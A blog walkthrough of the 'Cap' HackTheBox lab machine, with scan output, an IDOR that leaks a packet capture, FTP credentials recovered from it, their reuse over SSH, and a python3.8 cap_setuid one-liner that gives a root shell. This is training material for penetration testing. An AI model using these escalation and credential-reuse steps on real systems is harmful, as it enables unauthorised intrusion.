Cap Writeup / Walkthrough Hack the box

TL:DR

This is a walkthrough writeup on Cap which is a Linux box categorized as easy on HackTheBox. The initial foothold was gained by exploiting the parameter tampering vulnerability on the webpage, that exposed the credentials for FTP, which were also valid for SSH due to password reusability. Privilege escalation was rather easy on this one, in which we exploited the capabilities set for the user.

Cap Writeup: Scanning Network

Running the usual Nmap port scan :

Command used --> nmap -n -Pn -A -sC -sV -v -oN nmap.initial 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.19s latency).
Not shown: 997 closed ports

PORT   STATE SERVICE VERSION

21/tcp open  ftp     vsftpd 3.0.3

22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Mon, 25 Oct 2021 05:12:02 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Mon, 25 Oct 2021 05:11:56 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Mon, 25 Oct 2021 05:11:56 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
|     </body>
|_    </html>
| http-methods: 
|_  Supported Methods: GET OPTIONS HEAD
|_http-server-header: gunicorn
|_http-title: Security Dashboard

We have :
port 21 : FTP
port 22 : SSH
port 80 : web-server

I checked for anonymous FTP login, but it was disabled.

Running a Dirbuster Scan

DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project

--------------------------------

http://10.10.10.245:80
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/


--------------------------------
Files found during testing:

Files found with a 200 responce:

/ip
/netstat
/static/js/vendor/modernizr-2.8.3.min.js
/static/js/popper.min.js
/static/js/bootstrap.min.js
/static/js/metisMenu.min.js
/static/js/owl.carousel.min.js
/static/js/jquery.slimscroll.min.js
/static/js/jquery.slicknav.min.js
/static/js/vendor/jquery-2.2.4.min.js
/static/js/plugins.js
/static/js/pie-chart.js
/static/js/scripts.js
/static/js/line-chart.js

Files found with a 302 responce:

/capture


--------------------------------

Let’s go ahead with the website enumeration.

Website Enumeration

Cap Writeup
homepage
Cap Writeup
the ipconfig options shows the result for the ifconfig command
Cap Writeup
output of netstat command on going to the Network Status option.
Cap Writeup
Security Snapshot (5 second PCAP + Analysis)

Cap Writeup : Initial Foothold

  • I tried to intercept the requests with BurpSuite.
  • Initially I thought that for those “ipconfig” & “netstat” pages, the request probably contained the command that was executed on the server, & I could simply replace this command with a reverse shell. But nope, that wasn’t the case.
  • Although, that (5 Second PCAP & Analysis) allowed us to download the PCAP file.
  • By default, it allowed us to download /data/1 but when I tried to tamper with this parameter, I found that there exists a /data/0 file which seemed to have useful data.
  • Any entry used after 0 had no data, as seen in the images below :
What is a .pcap file ?

Packet Capture or PCAP files are data files created using the program and they contain the packet data of a network. These files are mainly used in analyzing the network characteristics of a certain data.
Cap Writeup
/data/ parameter

Downloading the /data/0 PCAP file as it has some data.

Downlaoding the /data/0 PCAP file

Opening & examining that PCAP file with Wireshark β€”>

1.pcap file was empty, although 0.pcap had data !

Examining the PCAP file

Opening the pcap file using Wireshark, we could see FTP packets. On following the TCP stream for those FTP packets, we were greeted with the FTP credentials πŸ™‚

pcap file in wireshark
FTP credentials revealed
FTP Creds
user: nathan
pass: Buck3tH4TF0RM3!

Cap Writeup: User Flag β›³

Logging in with those FTP creds :

β”Œβ”€[[email protected]]─[~/Desktop/Boxes/HTB/Cap]                                                       
└──╼ ftp $IP                                                                                 
Connected to 10.10.10.245.                                                                    
220 (vsFTPd 3.0.3)                                                                            
Name (10.10.10.245:root): nathan                                                              
331 Please specify the password.                                                              
Password:                                                                                     
230 Login successful.                                                                         
Remote system type is UNIX.                                                                   
Using binary mode to transfer files.

ftp> pwd
257 "/home/nathan" is the current directory

ftp> ls                                             
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r--------    1 1001     1001           33 Oct 25 05:03 user.txt
226 Directory send OK.     
                 
ftp> get user.txt                                                                             
local: user.txt remote: user.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for user.txt (33 bytes).
226 Transfer complete.
33 bytes received in 0.00 secs (19.9917 kB/s)

-------------------------------------------------------------------------------------

cat user.txt 
cb580***************************

Privilege Escalation

We also tried those FTP creds for SSH, because you never know , and indeed πŸ˜‰we were able to SSH into the box as user Nathan with those creds.

ssh [email protected]$IP
  • We went ahead to search for sudo permissions, SUID binaries and capabilities that could escalate the privileges by giving us the root shell.
  • And as expected from the name of the box “Cap”, giving off a hint about exploiting capabilities, we foundcap_setuid set for the python3.8 binary on the target.
[email protected]:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

Checking GTFO bins for the above capability β€”> python | GTFOBins


Root Flagβ›³

[email protected]:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

[email protected]:/root# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)

[email protected]:~# pwd
/home/nathan

[email protected]:~# cd /root

[email protected]:/root# ls
root.txt  snap

[email protected]:/root# cat root.txt 
0e13d***************************

That was it for Cap.

Until next time, do checkout other informative writeups and blogs here.

Posts created 10

Leave a Reply

Your email address will not be published.

Related Posts

Begin typing your search term above and press enter to search. Press ESC to cancel.

Back To Top